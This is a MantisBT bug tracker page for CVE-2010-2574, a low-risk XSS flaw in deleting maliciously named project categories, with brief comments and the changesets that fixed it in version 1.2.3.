View Issue Details

WikiRelated ChangesetsJump to Notes
IDProjectCategoryView StatusDate SubmittedLast Update
0012230mantisbtsecuritypublic2010-08-04 09:132015-03-15 20:07
Reporterjreese Assigned To 
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionfixed 
Product Version1.2.2 
Target Version1.2.3Fixed in Version1.2.3 
Summary0012230: CVE-2010-2574: XSS vulnerability when deleting maliciously named categories
Description

As reported by Secunia, SA40832, there is an XSS vulnerability when deleting categories that have been maliciously named. Chance of attack is extremely low due to requiring project manager access.

Additional Information

Official Secunia announcement: http://secunia.com/advisories/40832/

TagsNo tags attached.

Relationships

Relationship GraphDependency Graph
related to 0012231 closeddhx XSS vulnerability when uninstalling maliciously named plugins 
related to 0012369 closedgiallu CVE-2010-2574: XSS vulnerability when deleting maliciously named categories 

Activities

dhx

dhx

2010-08-04 09:28

reporter   ~0026211

All fixed, thanks John :)
jreese

jreese

2010-08-05 18:13

reporter   ~0026236

Last edited: 2010-08-05 18:21

Official Secunia announcement: http://secunia.com/advisories/40832/
oberger

oberger

2010-09-04 17:31

reporter   ~0026578

For future reference, this is also CVE-2010-2574 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2574)

Related Changesets

MantisBT: master 083c34f0

2010-08-04 09:17

dhx


Details Diff		 Fix 0012230: XSS vulnerability when deleting maliciously named categories

As reported by Secunia, SA40832, there is an XSS vulnerability when
deleting project categories that have been maliciously named. The chance
of attack is low due to requiring project manager access to create
malicious project categories in the first place.

Thanks to John Reese for debugging this issue.		 Affected Issues
0012230
mod - manage_proj_cat_delete.php Diff File

MantisBT: master-1.2.x a374a7c9

2010-08-04 09:17

dhx


Details Diff		 Fix 0012230: XSS vulnerability when deleting maliciously named categories

As reported by Secunia, SA40832, there is an XSS vulnerability when
deleting project categories that have been maliciously named. The chance
of attack is low due to requiring project manager access to create
malicious project categories in the first place.

Thanks to John Reese for debugging this issue.		 Affected Issues
0012230
mod - manage_proj_cat_delete.php Diff File